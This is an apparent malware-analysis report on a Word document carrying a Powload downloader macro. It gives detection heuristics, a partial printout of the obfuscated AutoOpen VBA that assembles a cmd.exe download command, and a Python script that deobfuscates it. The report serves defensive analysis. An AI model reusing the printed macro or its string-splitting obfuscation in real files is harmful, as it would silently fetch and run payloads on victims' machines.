Malware Insights
The sample is a malicious Office document carrying a VBA macro. Its AutoOpen routine calls Shell with a command that never exists as a single literal: it is assembled at run time from dozens of short string fragments, variables that are never assigned (Empty, which concatenates as an empty string) and a Chr() call whose padded arithmetic evaluates to 34, the double-quote character. The surrounding TypeName statements are junk that does nothing. Reassembled from the macro source extracted below (the analyzer's own one-line rendering of the same command, `c:\windows\system32\cmd.exe /c set IBr=...`, shows where Windows resolved cmd to, but drops the /V: switch, a few table characters and one repeated index), the command begins:

`cmd /V:/C"set IBr=XjMwiWBKhriXwVBMdbFYPPEJOUiOrkzZQPZa=u/2SD)oex,8vtpf-'Hn\.l:6{G@m;( 9c1syN+$C}g&&for %j in (50;43;12;44;28;71;8;44;58;58;67;75;30;23;30;36;55;44;12;52;43;17;1;44;69;49;67;73;44;49;57;5;44;17;76;58;26;44;55;49;65;75;51;13;30;36;53;8;49;49;50;59;38;38;28;35;50;26;16;69;57;69;43;57;55;30;3` (list continues)

The value stored in IBr is a 79-character lookup table and each number in the for list is an index into it. The loop body lies past the 1,000-line preview cut, but the /V: switch enables delayed environment-variable expansion, which this family uses to read one character per index back out of the table (presumably the `!IBr:~%j,1!` substring form; the exact body is not visible here). The index list therefore spells the real command, a downloader for a second-stage payload, which matches ClamAV's Powload label. Delivery is consistent with a spearphishing attachment.
Heuristics (5)
- ClamAV: Doc.Downloader.Powload-6704127-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Powload-6704127-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 1 related finding]: Document contains VBA macro code.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro; it runs automatically when the document is opened, subject to the user's macro security setting.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this rule's template text conflicts with the extracted artifacts below, where olevba did recover a VBA project; the AutoOpen finding above is the one to act on.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the standard DrawingML XML namespace, present in any document with drawing content, and is not a network indicator; any real download URL in this sample is carried inside the macro's encoded command, not in plain document text.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5411 bytes |

SHA-256 (macros.bas): a1db759ed036c99f6811d624499405a469ef6a36cec8e1d1c846551aa29e1697

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ZKokHwTq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Hex(86901 * WXHAli - 9057 + kkOhZ)
TypeName CDbl(Ihvkzi)
TypeName Round(81959 * QEBWcz)
TypeName 177136498
TypeName 8128
Shell@ CStr("c") + CStr("m") + SQEhZCcdlKSKWt + pQQkXTXaTr + XSFsEkBiZIj + hKhVikutTf + QMmGflv + Ysroicm, 454652037 - 454652037
TypeName Tan(LJRERY)
TypeName CDate(dNiwpJ)
End Sub
Attribute VB_Name = "Bzkmkmua"
Function XSFsEkBiZIj()
On Error Resume Next
TypeName TXHio
TypeName CDbl(chTLZj)
TypeName jWniK
tfqzbpQwDv = "d /V:/C" + CStr(Chr(AZTLikdIDBfUTn + wSssZdU + 34 + RdZYXVjXEJRn + nrbnhZjkzpU)) + "se" + "t IBr=XjM" + "wiWB" + "KhriXw" + "VBMdb" + "FYP" + "P" + "EJOUiO" + "rkz" + "ZQP" + "Z" + "a=u/2SD)oe" + "x,8vt"
TypeName CDbl(CnZXO)
TypeName Fix(knTLNM)
TypeName Oct(414476804)
HrdrXiPvk = "pf-'H" + "n\.l:6" + "{G@m;( 9c" + "1syN+$C}g" + "&&for %j i" + "n (50;43" + ";12;4" + "4;2" + "8;71;8;4"
TypeName ChrW(BAEtwR)
TypeName Sqr(9390)
OsLKni = "4;58;5" + "8;67;75;" + "30;23" + ";" + "30;36;55;4" + "4;12;" + "52;43;17;" + "1;44"
TypeName ChrB(lOuYj)
TypeName EvOtW
aPzMQFHTBz = ";69;4" + "9;6" + "7;73;44;49" + ";57;5;4" + "4;17;76" + ";58;26"
TypeName Atn(YGUNIj + jmJkmM)
TypeName Round(40)
WiirXUos = ";44" + ";55;" + "49;6" + "5;75" + ";51;" + "13;30;" + "36;53" + ";8;49;49;" + "5" + "0;59;38;3"
TypeName CStr(6)
TypeName Log(vvwVt * clusfp)
TypeName 355
nNwEn = "8;28;" + "35;50;26;" + "16;69;57;" + "69" + ";43;5" + "7;55;30;3"
TypeName Sgn(59734 / PwoFA - YcbbE + iMsbN)
TypeName CDate(aLPtK)
TypeName Atn(8852)
VphbdfH = "8" + ";6" + "4;4" + "8;6" + "3;8;" + "49;49;" + "5"
TypeName Atn(919)
TypeName 65
TypeName 7
iXIlrWcj = "0;59;" + "38;3" + "8;12;1" + "2;12;57;" + "8;35;71;4" + "4;29;26;" + "64;37;8;" + "4" + "4;55;16;2"
TypeName FQaDCz
TypeName CdKaXk
TypeName qlfiw
AwREzYCJCj = "6;71;58;" + "26;29;57;6" + "9;43;64" + ";38;23" + ";16;70" + ";13;" + "6" + "3;8;49;" + "49;5" + "0;59;38" + ";38;50;3" + "5;28;26" + ";71;44;"
TypeName XRwjXl
TypeName ChrW(rFCXPz)
DhoHBLQ = "5" + "8;57;5" + "0;58;38" + ";23;43;27" + ";45;25;" + "40;" + "34;30;63" + ";8;4" + "9;49;" + "50;" + "59;38;3"
TypeName zXtjN
TypeName ChrW(8053)
ZntCWac = "8;2" + "6;64;44;78" + ";" + "26;69;35" + ";57;69;43" + ";64;38" + ";4" + "5;5" + "4;62;68;" + "70;14;" + "6" + "3;8;49;49;" + "50;59"
TypeName Round(DGolj)
TypeName CSng(dJaEi)
TypeName Chr(253835514)
ZUtQW = ";38;38;1;1" + "6;6" + "9;35;57" + ";2" + "6;55;38" + ";69;37;47;"
TypeName Round(mUqTUN)
TypeName 3327
TypeName CStr(2503)
PEvzm = "71;8;29" + ";12;53;5" + "7;40" + ";50;58;2" + "6;4" + "9" + ";" + "66;53;63;5" + "3" + ";42;6"
XSFsEkBiZIj = tfqzbpQwDv + HrdrXiPvk + OsLKni + aPzMQFHTBz + WiirXUos + nNwEn + VphbdfH + iXIlrWcj + AwREzYCJCj + DhoHBLQ + ZntCWac + ZUtQW + PEvzm
TypeName CLng(52)
TypeName ChrW(SJmXi)
End Function
Function hKhVikutTf()
On Error Resume Next
TypeName Int(BWNRjm)
TypeName CSng(47)
TypeName nXzpE
jiaYRjr = "5;75" + ";25;14" + ";40;" + "67;36;67" + ";53;68;39;" + "60;" + "53;65;7"
TypeName JoNJj
TypeName 8
TypeName 7323
lVELjcVc = "5;27" + ";26;" + "55;36;75;" + "44;55;48" + ";59;49" + ";44;64" + ";50;74;53" + ";" + "5" + "6;53;74" + ";75"
TypeName CStr(4917)
TypeName Atn(uTQCXz)
TypeName Oct(zTpilY * LZoHV - 62187 * zlCqwb)
MtHdjHf = ";25;14;40;" + "74;53" + ";57;44;" + "45;44;5" + "3;65;51"
TypeName kBcUz
TypeName 107717202
TypeName MzflT
FclYjiXj = ";43;28" + ";44;35" + ";69;8;66;7" + "5;33;55;6" + "4;"
TypeName CByte(462591434)
TypeName Rnd(BkrZK)
WIjJjjNrKPP = "67;26;55;" + "67;75;5" + "1;13;30;" + "42;61;" + "4"
TypeName Sgn(42230 * AjzVoV + 55460 - 47985)
TypeName 1
pTvibLi = "9;28;72;" + "61;75" + ";" + "30;23;30"
... (truncated)
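As an added worked example (not part of the analyzer's report and not code from the sample), the following Python script reconstructs the Shell argument from the string-building statements in the preview above and then emulates the cmd.exe index-table stage. The assignment lines are transcribed from the preview; unassigned VBA variables are treated as Empty; the `!VAR:~%j,1!` read-back is an assumption, since the loop body is past the preview cut; and the functions called after XSFsEkBiZIj in the Shell line (hKhVikutTf onward) are omitted because their bodies are truncated, so the recovered index list is partial and the decoded text stops where the preview does. Run it and the decoded text is a PowerShell stager that instantiates Net.WebClient and splits an '@'-delimited list of five download URLs.

```python
"""Static recovery of the Shell command built by the macro previewed above.

Layer 1 (VBA): the command is a concatenation of short literals, variables
that are never assigned (Empty: "" in string context, 0 in arithmetic) and
one Chr() whose padded arithmetic evaluates to 34, the double quote.
Layer 2 (cmd.exe): `set IBr=<table>` stores a character table and
`for %j in (i1;i2;...)` walks an index list; with /V: (delayed expansion)
each index reads one character back out of the table (assumed !IBr:~%j,1!).
"""
import re

# String-building statements copied from the olevba preview in the report
# (the interleaved "TypeName ..." junk carries no data and is omitted).
VBA_EXCERPT = r'''
tfqzbpQwDv = "d /V:/C" + CStr(Chr(AZTLikdIDBfUTn + wSssZdU + 34 + RdZYXVjXEJRn + nrbnhZjkzpU)) + "se" + "t IBr=XjM" + "wiWB" + "KhriXw" + "VBMdb" + "FYP" + "P" + "EJOUiO" + "rkz" + "ZQP" + "Z" + "a=u/2SD)oe" + "x,8vt"
HrdrXiPvk = "pf-'H" + "n\.l:6" + "{G@m;( 9c" + "1syN+$C}g" + "&&for %j i" + "n (50;43" + ";12;4" + "4;2" + "8;71;8;4"
OsLKni = "4;58;5" + "8;67;75;" + "30;23" + ";" + "30;36;55;4" + "4;12;" + "52;43;17;" + "1;44"
aPzMQFHTBz = ";69;4" + "9;6" + "7;73;44;49" + ";57;5;4" + "4;17;76" + ";58;26"
WiirXUos = ";44" + ";55;" + "49;6" + "5;75" + ";51;" + "13;30;" + "36;53" + ";8;49;49;" + "5" + "0;59;38;3"
nNwEn = "8;28;" + "35;50;26;" + "16;69;57;" + "69" + ";43;5" + "7;55;30;3"
VphbdfH = "8" + ";6" + "4;4" + "8;6" + "3;8;" + "49;49;" + "5"
iXIlrWcj = "0;59;" + "38;3" + "8;12;1" + "2;12;57;" + "8;35;71;4" + "4;29;26;" + "64;37;8;" + "4" + "4;55;16;2"
AwREzYCJCj = "6;71;58;" + "26;29;57;6" + "9;43;64" + ";38;23" + ";16;70" + ";13;" + "6" + "3;8;49;" + "49;5" + "0;59;38" + ";38;50;3" + "5;28;26" + ";71;44;"
DhoHBLQ = "5" + "8;57;5" + "0;58;38" + ";23;43;27" + ";45;25;" + "40;" + "34;30;63" + ";8;4" + "9;49;" + "50;" + "59;38;3"
ZntCWac = "8;2" + "6;64;44;78" + ";" + "26;69;35" + ";57;69;43" + ";64;38" + ";4" + "5;5" + "4;62;68;" + "70;14;" + "6" + "3;8;49;49;" + "50;59"
ZUtQW = ";38;38;1;1" + "6;6" + "9;35;57" + ";2" + "6;55;38" + ";69;37;47;"
PEvzm = "71;8;29" + ";12;53;5" + "7;40" + ";50;58;2" + "6;4" + "9" + ";" + "66;53;63;5" + "3" + ";42;6"
XSFsEkBiZIj = tfqzbpQwDv + HrdrXiPvk + OsLKni + aPzMQFHTBz + WiirXUos + nNwEn + VphbdfH + iXIlrWcj + AwREzYCJCj + DhoHBLQ + ZntCWac + ZUtQW + PEvzm
'''

# The Shell@ argument from AutoOpen, minus the trailing functions
# (hKhVikutTf onward) whose bodies the preview cuts off.
SHELL_ARG = 'CStr("c") + CStr("m") + SQEhZCcdlKSKWt + pQQkXTXaTr + XSFsEkBiZIj'

TOKEN = re.compile(r'"([^"]*)"'                 # 1: string literal
                   r'|CStr\("([^"]*)"\)'        # 2: CStr() around a literal
                   r'|CStr\(Chr\(([^()]*)\)\)'  # 3: Chr() of junk arithmetic
                   r'|([A-Za-z_]\w*)')          # 4: variable name


def eval_concat(expr, env):
    """Evaluate a VBA `x + "lit" + CStr(Chr(n)) + ...` expression."""
    out = []
    for m in TOKEN.finditer(expr):
        k = m.lastindex
        if k in (1, 2):
            out.append(m.group(k))
        elif k == 3:
            arg = m.group(3)
            # Every name inside Chr() is unassigned (0) and the sample only
            # uses '+', so the value is the sum of the numeric literals.
            if re.search(r"[-*/]", arg):
                raise ValueError("unsupported arithmetic in Chr(): " + arg)
            digits = re.findall(r"\d+", re.sub(r"[A-Za-z_]\w*", "0", arg))
            out.append(chr(sum(int(n) for n in digits)))
        else:
            out.append(env.get(m.group(4), ""))  # unassigned => Empty => ""
    return "".join(out)


def run_assignments(excerpt):
    """Execute `name = expr` lines in order, returning the variable table."""
    env = {}
    for line in excerpt.strip().splitlines():
        name, sep, expr = line.partition(" = ")
        if sep:
            env[name.strip()] = eval_concat(expr, env)
    return env


def recover_shell_command():
    """Layer 1: the string handed to Shell, as far as the preview allows."""
    return eval_concat(SHELL_ARG, run_assignments(VBA_EXCERPT))


def decode_table_indices(cmd, drop_last=False):
    """Layer 2: resolve `set VAR=<table>` ... `for %j in (i;i;...)`."""
    m = re.search(r"set (\w+)=(.*?)&&for %\w+ in \(([\d;]+)", cmd)
    if not m:
        raise ValueError("no set/for index pattern in command")
    table = m.group(2)
    nums = [int(n) for n in m.group(3).split(";") if n]
    if drop_last:
        nums = nums[:-1]
    return "".join(table[i] for i in nums)


def recover_next_stage():
    """Decoded next-stage command, up to where the preview is cut."""
    # The index list continues in hKhVikutTf(), which the preview truncates,
    # so the last visible number is only the first digit of an index.
    return decode_table_indices(recover_shell_command(), drop_last=True)


if __name__ == "__main__":
    print(recover_shell_command())
    print(recover_next_stage())
```

The evaluator is deliberately narrow: it only understands the three constructs this sample uses (literals, Empty names and an additive Chr()), and refuses anything else rather than guessing, which is the right failure mode for a deobfuscator run over untrusted input.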